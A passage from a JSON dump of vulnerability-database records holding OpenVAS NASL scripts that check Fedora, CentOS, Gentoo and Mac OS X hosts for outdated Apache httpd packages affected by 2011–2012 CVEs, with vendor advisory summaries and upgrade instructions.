server.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\");\n script_id(863961);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:41 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\",\n \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-1598\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1598\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1598", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863961", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1598\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863961\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:41 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\",\n \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-1598\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1598\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2012:0128 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881089", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881089\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"CESA\", value:\"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 
(released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1642", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd 
FEDORA-2012-1642\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863759\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:18:18 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-1642\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1642\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:57:22", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1642", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:863759", "href": "http://plugins.openvas.org/nasl.php?oid=863759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1642\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"httpd on Fedora 15\";\ntag_insight = \"The Apache HTTP Server is a powerful, efficient, and extensible\n web server.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\");\n script_id(863759);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:18:18 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-1642\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1642\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:14", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-25.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201206-25 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2010-0434", "CVE-2012-0031", "CVE-2010-2791", "CVE-2012-0883", "CVE-2010-0408", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3192", "CVE-2010-1452", "CVE-2011-3348"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231071551", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071551", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201206_25.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71551\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2010-0408\", \"CVE-2010-0434\", \"CVE-2010-1452\", \"CVE-2010-2791\", \"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0883\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:53 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-25 (apache)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in Apache HTTP Server.\");\n script_tag(name:\"solution\", value:\"All Apache HTTP Server users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.2.22-r1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-25\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=308049\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=330195\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=380475\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=382971\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=385859\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389353\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=392189\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=398761\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=401081\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=412481\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201206-25.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.22-r1\"), vulnerable: make_list(\"lt 2.2.22-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report 
!= \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "description": "The remote host is missing updates announced in\nadvisory GLSA 201206-25.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201206-25 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2010-0434", "CVE-2012-0031", "CVE-2010-2791", "CVE-2012-0883", "CVE-2010-0408", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3192", "CVE-2010-1452", "CVE-2011-3348"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71551", "href": "http://plugins.openvas.org/nasl.php?oid=71551", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in Apache HTTP Server.\";\ntag_solution = \"All Apache HTTP Server users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.2.22-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-25\nhttp://bugs.gentoo.org/show_bug.cgi?id=308049\nhttp://bugs.gentoo.org/show_bug.cgi?id=330195\nhttp://bugs.gentoo.org/show_bug.cgi?id=380475\nhttp://bugs.gentoo.org/show_bug.cgi?id=382971\nhttp://bugs.gentoo.org/show_bug.cgi?id=385859\nhttp://bugs.gentoo.org/show_bug.cgi?id=389353\nhttp://bugs.gentoo.org/show_bug.cgi?id=392189\nhttp://bugs.gentoo.org/show_bug.cgi?id=398761\nhttp://bugs.gentoo.org/show_bug.cgi?id=401081\nhttp://bugs.gentoo.org/show_bug.cgi?id=412481\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201206-25.\";\n\n \n \nif(description)\n{\n script_id(71551);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2010-0408\", \"CVE-2010-0434\", \"CVE-2010-1452\", \"CVE-2010-2791\", \"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0883\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:53 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-25 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n 
script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/apache\", unaffected: make_list(\"ge 2.2.22-r1\"), vulnerable: make_list(\"lt 2.2.22-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:50:34", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3722", "CVE-2011-4317", "CVE-2012-2311", "CVE-2011-3026", "CVE-2012-2386", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-4599", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2011-3389", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368", "CVE-2012-0670", "CVE-2012-0650", "CVE-2012-1172", "CVE-2011-3048", "CVE-2012-0671", "CVE-2012-1173", "CVE-2012-0831", "CVE-2012-0668", "CVE-2012-3719"], "modified": "2017-07-04T00:00:00", "id": "OPENVAS:802968", "href": "http://plugins.openvas.org/nasl.php?oid=802968", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_macosx_su12-004.nasl 6521 2017-07-04 14:51:10Z cfischer $\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to cause a buffer overflow,\n disclose potentially sensitive information or cause a DoS.\n Impact Level: System/Application\";\ntag_affected = \"Apache\n BIND\n CoreText\n Data Security\n 